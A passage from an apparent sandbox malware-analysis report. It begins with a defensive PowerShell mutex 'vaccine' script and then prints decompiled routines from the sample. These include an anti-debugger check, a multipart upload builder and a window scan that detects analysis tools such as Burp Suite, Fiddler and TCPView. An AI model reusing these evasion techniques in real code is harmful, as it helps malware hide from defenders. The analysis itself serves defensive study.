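        $m = [System.Threading.Mutex]::OpenExisting($Name,
                [System.Security.AccessControl.MutexRights]::Synchronize)
        $m.Dispose()
        return 'Present'                 # created by the sample or by an earlier vaccine
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        return 'Absent'
    } catch [System.UnauthorizedAccessException] {
        # E1001A0F0 builds a NULL-DACL mutex, which denies nobody; a denial means some other
        # program owns this name.
        return 'PresentButRestricted'
    }
}

function New-MutexVaccine {
    param([string]$Name)
    # The DACL must let the sample's CreateMutexA succeed. Opening an existing mutex through
    # CreateMutexA requests MUTEX_ALL_ACCESS; against a tighter DACL it returns NULL with
    # ERROR_ACCESS_DENIED, and E1001A0F0 then returns 0 ("not running") because it requires a
    # non-NULL handle before it looks for ERROR_ALREADY_EXISTS (0xB7). So grant Everyone full
    # control, the same effective access as the sample's own NULL DACL.
    $everyone = [System.Security.Principal.SecurityIdentifier]::new(
        [System.Security.Principal.WellKnownSidType]::WorldSid, $null)
    $rule = [System.Security.AccessControl.MutexAccessRule]::new(
        $everyone, [System.Security.AccessControl.MutexRights]::FullControl,
        [System.Security.AccessControl.AccessControlType]::Allow)
    $security = [System.Security.AccessControl.MutexSecurity]::new()
    $security.AddAccessRule($rule)

    $createdNew = $false
    $m = [System.Threading.Mutex]::new($false, $Name, [ref]$createdNew, $security)
    if (-not $createdNew) {
        $m.Dispose()
        throw "'$Name' already exists; the sample (or another vaccine) holds it."
    }
    return $m      # keep this object alive; disposing it releases the name
}

$state = Test-SampleMutex -Name $MutexName
"Mutex '$MutexName': $state"

if ($Vaccinate -and $state -eq 'Absent') {
    $held = New-MutexVaccine -Name $MutexName
    "Holding '$MutexName'; any later call to E1001A0F0 sees ERROR_ALREADY_EXISTS. Exiting releases it."
    try { while ($true) { Start-Sleep -Seconds 60 } } finally { $held.Dispose() }
}
```

Invoke the script with -MutexName '<name from the dump>' to probe, and add -Vaccinate to hold the name. A 'PresentButRestricted' result is itself informative: the sample's own mutex never denies access, so an access-denied open means a different program owns the name.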

                                                                                                                                                C-Code - Quality: 37%
			E10019FF0(void* __ecx) {
				char _v8;

				// CheckRemoteDebuggerPresent takes two arguments; the third is a decompiler artifact (quality 37%).
				// This is the sample's own debugger check, not CRT boilerplate.
				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx);
				return _v8;      // non-zero when a debugger is attached to the current process
			}

Instruction addresses: 0x10019fff-0x1001a00b

                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32(00000001,?,?,1001A032,?,?,1001A0C0), ref: 10019FF8
                                                                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(00000000,?,?,1001A032,?,?,1001A0C0), ref: 10019FFF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CheckCurrentDebuggerPresentProcessRemote
• String ID:
• API String ID: 3244773808-0
• Opcode ID: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
• Instruction ID: 1968f35720b6d0cf004a0d8eaef2a233a09a3f8537d50a9d5b5f9af22a971398
• Opcode Fuzzy Hash: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
• Instruction Fuzzy Hash: DDC0127680020CBBCB00DBE0CC8C88AB7ACEA08211B200185F909C3200DA32AA088AA4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
E10021460(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
	char _v8;
	intOrPtr _v16;
	char* _v20;
	char _v24;
	char _v28;
	char _v543;
	char _v544;
	char _v807;
	char _v808;
	char* _v812;
	char _v1079;
	char _v1080;
	char* _v1084;
	char* _v1088;
	char _v1599;
	char _v1600;
	intOrPtr _v1604;
	char _v15703;
	char _v15704;
	char* _v15708;
	char _v29807;
	char _v29808;
	char* _v29812;
	char _v43911;
	char _v43912;
	char _v58007;
	char _v58008;
	char _v58024;
	char _v58052;
	char _v58080;
	char _v58084;
	void* __esi;
	void* _t172;
	intOrPtr _t179;
	void* _t186;
	void* _t195;
	void* _t216;
	void* _t218;
	void* _t237;
	void* _t254;
	intOrPtr _t297;
	intOrPtr _t357;
	void* _t359;
	void* _t366;
	void* _t376;
	void* _t385;
	void* _t392;

	_t353 = __edi;
	_t265 = __ebx;
	_push(0xffffffff);
	_push(E10022B1C);
	_push( *[fs:0x0]);
	 *[fs:0x0] = _t357;
	E10018AA0(0xe2d4);
	_push(_t354);
	_v24 = 0;
	_v28 = "--";
	if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
		_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
		_v1084 = "Content-Type: %s";
		_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
		_v808 = 0;
		E1000CF20(__edi,  &_v807, 0, 0x103);
		_v1080 = 0;
		E1000CF20(_t353,  &_v1079, 0, 0x103);
		_v1600 = 0;
		E1000CF20(_t353,  &_v1599, 0, 0x1ff);
		_push(_a20);
		_push(_a16);
		E1000CC93(_t353,  &_v808, _v812, _a16);
		E1000CC93(_t353,  &_v1080, _v1084, _a24);
		_push( &_v1080);
		_push( &_v808);
		_push(_a4);
		E1000CC93(_t353,  &_v1600, _v1088, _v28);
		_t392 = _t357 + 0x5c;
		if( *_a36 != 0) {
			E1000D190(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAC0( &_v1600));
			_t392 = _t392 + 0x10;
		}
		_t254 = E1000CAC0( &_v1600);
		_t357 = _t392 + 4;
		_v24 = _t254 + _v24;
		if( *_a36 != 0) {
			E1000D190(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
			_t357 = _t357 + 0xc;
		}
		_v24 = _v24 + _a32;
	}
	if(_a8 != 0 && _a12 > 0) {
		_t172 = E10001A50(_a8, "=");
		_t357 = _t357 + 8;
		if(_t172 != 0) {
			_v15708 = "Content-Disposition: form-data; name=\"%s\"";
			_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
			_v58008 = 0;
			E1000CF20(_t353,  &_v58007, 0, 0x370f);
			_v29808 = 0;
			E1000CF20(_t353,  &_v29807, 0, 0x370f);
			_v43912 = 0;
			E1000CF20(_t353,  &_v43911, 0, 0x370f);
			_v15704 = 0;
			E1000CF20(_t353,  &_v15703, 0, 0x370f);
			_t179 = E10001A50(_a8, "&");
			_t366 = _t357 + 0x38;
			_v1604 = _t179;
			if(_v1604 != 0) {
				E10001160( &_v58052, __eflags, _a8);
				_v8 = 0;
				E10002FE0( &_v58024, __eflags);
				_v8 = 1;
				E10001160( &_v58080, __eflags, "&");
				_v8 = 2;
				E1001A850(__eflags,  &_v58052,  &_v58024,  &_v58080);
				_t357 = _t366 + 0xc;
				_v58084 = 0;
				while(1) {
					_t186 = E100021E0( &_v58024);
					__eflags = _v58084 - _t186;
					if(_v58084 >= _t186) {
						break;
					}
					E1000CF20(_t353,  &_v43912, 0, 0x3710);
					E1000CF20(_t353,  &_v15704, 0, 0x3710);
					_t195 = E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=");
					_t354 = _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084));
					E1000D190(_t265, _t353, _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E10003030( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)));
					E1000D8A3(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=") + 1);
					E1000CF20(_t353,  &_v58008, 0, 0x3710);
					E1000CF20(_t353,  &_v29808, 0, 0x3710);
					E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
					_push( &_v15704);
					_push( &_v58008);
					_push(_a4);
					E1000CC93(_t353,  &_v29808, _v29812, _v28);
					_t376 = _t357 + 0x7c;
					__eflags =  *_a36;
					if( *_a36 != 0) {
						_t218 = E1000CAC0( &_v29808);
						__eflags =  *_a36 + _v24;
						E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
						_t376 = _t376 + 0x10;
					}
					_t216 = E1000CAC0( &_v29808);
					_t357 = _t376 + 4;
					_v24 = _t216 + _v24;
					_t297 = _v58084 + 1;
					__eflags = _t297;
					_v58084 = _t297;
				}
				_v8 = 1;
				E100011A0( &_v58080);
				_v8 = 0;
				E10003010( &_v58024);
				_v8 = 0xffffffff;
				E100011A0( &_v58052);
			} else {
				E1000D190(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
				E1000D8A3(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
				E1000CF20(_t353,  &_v58008, 0, 0x3710);
				E1000CF20(_t353,  &_v29808, 0, 0x3710);
				E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
				_push( &_v15704);
				_push( &_v58008);
				_push(_a4);
				E1000CC93(_t353,  &_v29808, _v29812, _v28);
				_t385 = _t366 + 0x64;
				if( *_a36 != 0) {
					E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAC0( &_v29808));
					_t385 = _t385 + 0x10;
				}
				_t237 = E1000CAC0( &_v29808);
				_t357 = _t385 + 4;
				_v24 = _t237 + _v24;
			}
		}
	}
	_v20 = "\r\n%s%s%s\r\n";
	_v544 = 0;
	E1000CF20(_t353,  &_v543, 0, 0x1ff);
	_push(_v28);
	_push(_a4);
	E1000CC93(_t353,  &_v544, _v20, _v28);
	_t359 = _t357 + 0x20;
	if( *_a36 != 0) {
		E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAC0( &_v544));
		_t359 = _t359 + 0x10;
	}
	_v24 = E1000CAC0( &_v544) + _v24;
	 *[fs:0x0] = _v16;
	return _v24;
}

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 854390245-0
                                                                                                                                                • Opcode ID: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                • Instruction ID: 2d82e108429a1e59b14db5b6321f6623d8f234d0aa847db4e2dbab4e051ccd9c
                                                                                                                                                • Opcode Fuzzy Hash: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                • Instruction Fuzzy Hash: BC0290B6D00218ABDB10DB90DC82FDE777DEB58340F4445A8F509A7285EB74AB44CFA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                			E100133E0(void* __ebx) {
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				_Unknown_base(*)()* _t7;
                                                                                                                                                				long _t10;
                                                                                                                                                				void* _t11;
                                                                                                                                                				int _t12;
                                                                                                                                                				void* _t18;
                                                                                                                                                				intOrPtr _t21;
                                                                                                                                                				long _t26;
                                                                                                                                                				void* _t30;
                                                                                                                                                				struct HINSTANCE__* _t37;
                                                                                                                                                				void* _t40;
                                                                                                                                                				void* _t42;
				/* Decompiled body of the routine at 0x100133E0 (sandbox output; _tNN names are synthetic).
				 * Its shape matches _mtinit() from the MSVC CRT (tidtable.c): resolve the fibre-local
				 * storage (FLS) exports from KERNEL32, fall back to the TLS API when they are missing,
				 * keep the four function pointers encoded, then set up the calling thread's per-thread
				 * data block. CRT names in the comments are inferred from that source by analogy with
				 * the labelled subcalls listed under APIs below; the dump itself only carries addresses. */
				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					/* 0x10333818..0x10333824: gpFlsAlloc, gpFlsGetValue, gpFlsSetValue, gpFlsFree */
					 *0x10333818 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1033381c = GetProcAddress(_t37, "FlsGetValue");
					 *0x10333820 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10333818;
					_t40 = TlsSetValue;
					 *0x10333824 = _t7;
					if( *0x10333818 == 0) {
						L6:
						/* Any FLS export missing (pre-Vista kernel32): substitute the TLS API.
						 * E10013097 is a CRT wrapper standing in for FlsAlloc (__crtTlsAlloc in the source). */
						 *0x1033381c = TlsGetValue;
						 *0x10333818 = E10013097;
						 *0x10333820 = _t40;
						 *0x10333824 = TlsFree;
					} else {
						__eflags =  *0x1033381c;
						if( *0x1033381c == 0) {
							goto L6;
						} else {
							__eflags =  *0x10333820;
							if( *0x10333820 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					/* __getvalueindex: a TLS slot that caches the (still raw) gpFlsGetValue */
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;   /* TLS_OUT_OF_INDEXES */
					 *0x10332c6c = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;   /* return FALSE */
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1033381c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100117FA();   /* __init_pointers */
							/* __encode_pointer on all four slots: from here on .data never holds the raw
							 * addresses, and every use below goes through __decode_pointer (E10013034) first. */
							 *0x10333818 = E10012FC8( *0x10333818);
							 *0x1033381c = E10012FC8( *0x1033381c);
							 *0x10333820 = E10012FC8( *0x10333820);
							 *0x10333824 = E10012FC8( *0x10333824);
							_t18 = E1000F88D();   /* not labelled by the sandbox; _mtinitlocks() sits here in the CRT source */
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E100130CA();   /* __mtterm: tear down what was set up so far (its subcalls include TlsFree) */
								goto L15;
							} else {
								/* __flsindex = gpFlsAlloc(callback): decode the slot, then call through it.
								 * L10013256 is the per-thread cleanup callback (_freefls in the CRT source). */
								_push(L10013256);
								_t21 =  *((intOrPtr*)(E10013034( *0x10333818)))();
								__eflags = _t21 - 0xffffffff;   /* FLS_OUT_OF_INDEXES */
								 *0x10332c68 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									/* __calloc_crt(1, 0x214): 0x214 bytes is sizeof(struct _tiddata) for this CRT version */
									_t42 = E100148B1(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										/* gpFlsSetValue(__flsindex, ptd), again through __decode_pointer */
										_push(_t42);
										_push( *0x10332c68);
										__eflags =  *((intOrPtr*)(E10013034( *0x10333820)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10013107(_t30, _t37, _t42, __eflags);   /* __initptd(ptd, NULL) */
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;   /* ptd->_thandle = (uintptr_t)-1 */
											 *_t42 = _t26;   /* ptd->_tid */
											_t11 = 1;   /* return TRUE */
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E100130CA();   /* __mtterm */
					return 0;
				}
			}

Address column (one entry per decompiled statement above; the body runs from 0x100133E0 to 0x10013563, and the 0x00000000 entries fall on the goto lines, which emit no instruction of their own).

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000E9BD), ref: 100133E6
                                                                                                                                                • __mtterm.LIBCMT ref: 100133F2
                                                                                                                                                  • Part of subcall function 100130CA: __decode_pointer.LIBCMT ref: 100130DB
                                                                                                                                                  • Part of subcall function 100130CA: TlsFree.KERNEL32(0000001F,1001355F), ref: 100130F5
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10013408
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10013415
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10013422
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001342F
                                                                                                                                                • TlsAlloc.KERNEL32 ref: 1001347F
                                                                                                                                                • TlsSetValue.KERNEL32(00000000), ref: 1001349A
                                                                                                                                                • __init_pointers.LIBCMT ref: 100134A4
                                                                                                                                                • __encode_pointer.LIBCMT ref: 100134AF
                                                                                                                                                • __encode_pointer.LIBCMT ref: 100134BF
                                                                                                                                                • __encode_pointer.LIBCMT ref: 100134CF
                                                                                                                                                • __encode_pointer.LIBCMT ref: 100134DF
                                                                                                                                                • __decode_pointer.LIBCMT ref: 10013500
                                                                                                                                                • __calloc_crt.LIBCMT ref: 10013519
                                                                                                                                                • __decode_pointer.LIBCMT ref: 10013533
                                                                                                                                                • __initptd.LIBCMT ref: 10013542
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 10013549
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                • API String ID: 2657569430-3819984048
                                                                                                                                                • Opcode ID: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                • Instruction ID: fc5c9c1e2f27ce9595d1d322ac009eb1f7bdbda0747ab5db418f9efda91381a0
                                                                                                                                                • Opcode Fuzzy Hash: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                • Instruction Fuzzy Hash: A3318D75C04221AADB12EB78CCC69057BE9EB843A1F10C53AF508DE2A2DB35D489CF90
                                                                                                                                                Uniqueness
                                                                                                                                                • Uniqueness Score: -1.00%
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E100193D0(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                				char _v267;
                                                                                                                                                				char _v268;
                                                                                                                                                				char _v531;
                                                                                                                                                				char _v532;
                                                                                                                                                				void* _t35;
                                                                                                                                                				void* _t37;
                                                                                                                                                				void* _t38;
                                                                                                                                                				void* _t39;
                                                                                                                                                				void* _t41;
                                                                                                                                                				void* _t42;
                                                                                                                                                				void* _t43;
                                                                                                                                                				void* _t45;
                                                                                                                                                				void* _t46;
                                                                                                                                                				void* _t48;
                                                                                                                                                				void* _t51;
                                                                                                                                                				void* _t53;
                                                                                                                                                				void* _t55;
                                                                                                                                                				void* _t57;
                                                                                                                                                				void* _t61;
                                                                                                                                                				void* _t66;
                                                                                                                                                				void* _t88;
                                                                                                                                                				void* _t91;
                                                                                                                                                				void* _t92;
                                                                                                                                                				void* _t93;
                                                                                                                                                				void* _t94;
                                                                                                                                                				void* _t95;
                                                                                                                                                				void* _t96;
                                                                                                                                                				void* _t97;
                                                                                                                                                				void* _t98;
                                                                                                                                                				void* _t99;
                                                                                                                                                				void* _t100;
                                                                                                                                                
                                                                                                                                                				_t87 = __edi;
                                                                                                                                                				_t70 = __ebx;
                                                                                                                                                				_v532 = 0;
                                                                                                                                                				E1000CF20(__edi,  &_v531, 0, 0x103);
                                                                                                                                                				_v268 = 0;
                                                                                                                                                				E1000CF20(_t87,  &_v267, 0, 0x103);
                                                                                                                                                				GetClassNameA(_a4,  &_v532, 0x104);
                                                                                                                                                				GetWindowTextA(_a4,  &_v268, 0x104);
                                                                                                                                                				_t35 = E1000CAC0( &_v532);
                                                                                                                                                				_t91 = _t88 + 0x1c;
                                                                                                                                                				_t108 = _t35;
                                                                                                                                                				if(_t35 <= 0) {
                                                                                                                                                					L30:
                                                                                                                                                					return 1;
                                                                                                                                                				}
                                                                                                                                                				_t37 = E10019330(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
                                                                                                                                                				_t92 = _t91 + 8;
                                                                                                                                                				if(_t37 == 0) {
                                                                                                                                                					_t38 = E10019330(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
                                                                                                                                                					_t93 = _t92 + 8;
                                                                                                                                                					__eflags = _t38;
                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                						_t39 = E10019330(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
                                                                                                                                                						_t94 = _t93 + 8;
                                                                                                                                                						__eflags = _t39;
                                                                                                                                                						if(__eflags == 0) {
                                                                                                                                                							_t41 = E10019330(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
                                                                                                                                                							_t95 = _t94 + 8;
                                                                                                                                                							__eflags = _t41;
                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                								_t42 = E10019330(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
                                                                                                                                                								_t96 = _t95 + 8;
                                                                                                                                                								__eflags = _t42;
                                                                                                                                                								if(_t42 == 0) {
                                                                                                                                                									_t43 = E1000CAC0( &_v268);
                                                                                                                                                									_t97 = _t96 + 4;
                                                                                                                                                									__eflags = _t43;
                                                                                                                                                									if(__eflags <= 0) {
                                                                                                                                                										L20:
                                                                                                                                                										_t45 = E1000CAC0( &_v268);
                                                                                                                                                										_t98 = _t97 + 4;
                                                                                                                                                										__eflags = _t45;
                                                                                                                                                										if(__eflags <= 0) {
                                                                                                                                                											L23:
                                                                                                                                                											_t46 = E10019330(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
                                                                                                                                                											_t99 = _t98 + 8;
                                                                                                                                                											__eflags = _t46;
                                                                                                                                                											if(_t46 == 0) {
                                                                                                                                                												goto L30;
                                                                                                                                                											}
                                                                                                                                                											_t48 = E1000CAC0( &_v268);
                                                                                                                                                											_t100 = _t99 + 4;
                                                                                                                                                											__eflags = _t48;
                                                                                                                                                											if(__eflags <= 0) {
                                                                                                                                                												L27:
                                                                                                                                                												__eflags = E1000CAC0( &_v268);
                                                                                                                                                												if(__eflags <= 0) {
                                                                                                                                                													goto L30;
                                                                                                                                                												}
                                                                                                                                                												_t51 = E10019330(_t70, _t87, __eflags,  &_v268, "Burp Suite");
                                                                                                                                                												__eflags = _t51;
                                                                                                                                                												if(_t51 == 0) {
                                                                                                                                                													goto L30;
                                                                                                                                                												}
                                                                                                                                                												 *0x10333dcc = 1;
                                                                                                                                                												return 0;
                                                                                                                                                											}
                                                                                                                                                											_t53 = E10019330(_t70, _t87, __eflags,  &_v268, "Charles");
                                                                                                                                                											_t100 = _t100 + 8;
                                                                                                                                                											__eflags = _t53;
                                                                                                                                                											if(_t53 == 0) {
                                                                                                                                                												goto L27;
                                                                                                                                                											}
                                                                                                                                                											 *0x10333dcc = 1;
                                                                                                                                                											return 0;
                                                                                                                                                										}
                                                                                                                                                										_t55 = E10019330(_t70, _t87, __eflags,  &_v268, "ASExplorer");
                                                                                                                                                										_t98 = _t98 + 8;
                                                                                                                                                										__eflags = _t55;
                                                                                                                                                										if(__eflags == 0) {
                                                                                                                                                											goto L23;
                                                                                                                                                										}
                                                                                                                                                										 *0x10333dcc = 1;
                                                                                                                                                										return 0;
                                                                                                                                                									}
                                                                                                                                                									_t57 = E10019330(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
                                                                                                                                                									_t97 = _t97 + 8;
                                                                                                                                                									__eflags = _t57;
                                                                                                                                                									if(_t57 == 0) {
                                                                                                                                                										goto L20;
                                                                                                                                                									}
                                                                                                                                                									 *0x10333dcc = 1;
                                                                                                                                                									return 0;
                                                                                                                                                								}
                                                                                                                                                								__eflags = E1000CAC0( &_v268);
                                                                                                                                                								if(__eflags <= 0) {
                                                                                                                                                									L16:
                                                                                                                                                									goto L30;
                                                                                                                                                								}
                                                                                                                                                								_t61 = E10019330(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
                                                                                                                                                								__eflags = _t61;
                                                                                                                                                								if(_t61 == 0) {
                                                                                                                                                									goto L16;
                                                                                                                                                								}
                                                                                                                                                								 *0x10333dcc = 1;
                                                                                                                                                								return 0;
                                                                                                                                                							}
                                                                                                                                                							 *0x10333dcc = 1;
                                                                                                                                                							return 0;
                                                                                                                                                						}
                                                                                                                                                						 *0x10333dcc = 1;
                                                                                                                                                						return 0;
                                                                                                                                                					}
                                                                                                                                                					 *0x10333dcc = 1;
                                                                                                                                                					return 0;
                                                                                                                                                				}
                                                                                                                                                				_t66 = E1000CAC0( &_v268);
                                                                                                                                                				_t110 = _t66;
                                                                                                                                                				if(_t66 <= 0 || E10019330(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
                                                                                                                                                					goto L30;
                                                                                                                                                				} else {
                                                                                                                                                					 *0x10333dcc = 1;
                                                                                                                                                					return 0;
                                                                                                                                                				}
                                                                                                                                                			}

Instruction addresses listed beside the decompiled code (decompiler address column, in report order):
0x100193d0 0x100193d0 0x100193d9 0x100193ee 0x100193f6 0x1001940b 0x10019423 0x10019439
0x10019446 0x1001944b 0x1001944e 0x10019450 0x100196a0 0x00000000 0x100196a0 0x10019462
0x10019467 0x1001946c 0x100194bb 0x100194c0 0x100194c3 0x100194c5 0x100194e9 0x100194ee
0x100194f1 0x100194f3 0x10019517 0x1001951c 0x1001951f 0x10019521 0x10019545 0x1001954a
0x1001954d 0x1001954f 0x10019599 0x1001959e 0x100195a1 0x100195a3 0x100195d3 0x100195da
0x100195df 0x100195e2 0x100195e4 0x10019614 0x10019620 0x10019625 0x10019628 0x1001962a
0x00000000 0x00000000 0x10019633 0x10019638 0x1001963b 0x1001963d 0x10019667 0x10019676
0x10019678 0x00000000 0x00000000 0x10019686 0x1001968e 0x10019690 0x00000000 0x00000000
0x10019692 0x00000000 0x1001969c 0x1001964b 0x10019650 0x10019653 0x10019655 0x00000000
0x00000000 0x10019657 0x00000000 0x10019661 0x100195f2 0x100195f7 0x100195fa 0x100195fc
0x00000000 0x00000000 0x100195fe 0x00000000 0x10019608 0x100195b1 0x100195b6 0x100195b9
0x100195bb 0x00000000 0x00000000 0x100195bd 0x00000000 0x100195c7 0x10019560 0x10019562
0x1001958d 0x00000000 0x1001958d 0x10019570 0x10019578 0x1001957a 0x00000000 0x00000000
0x1001957c 0x00000000 0x10019586 0x10019523 0x00000000 0x1001952d 0x100194f5 0x00000000
0x100194ff 0x100194c7 0x00000000 0x100194d1 0x10019475 0x1001947d 0x1001947f 0x00000000
0x10019499 0x10019499 0x00000000 0x100194a3

APIs
• _memset.LIBCMT ref: 100193EE
• _memset.LIBCMT ref: 1001940B
• GetClassNameA.USER32(?,00000000,00000104), ref: 10019423
• GetWindowTextA.USER32 ref: 10019439
• _strlen.LIBCMT ref: 10019446
  • Part of subcall function 10019330: _strlen.LIBCMT ref: 1001933B
  • Part of subcall function 10019330: _strlen.LIBCMT ref: 10019349
• _strlen.LIBCMT ref: 10019475
Strings
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _strlen$_memset$ClassNameTextWindow
• String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
• API String ID: 1565133231-1140939848
• Opcode ID: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
• Instruction ID: a5f97e290b41472754b7e9ce8727d5d20b8c63e5840e42e0df40fd03ad5c4008
• Opcode Fuzzy Hash: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
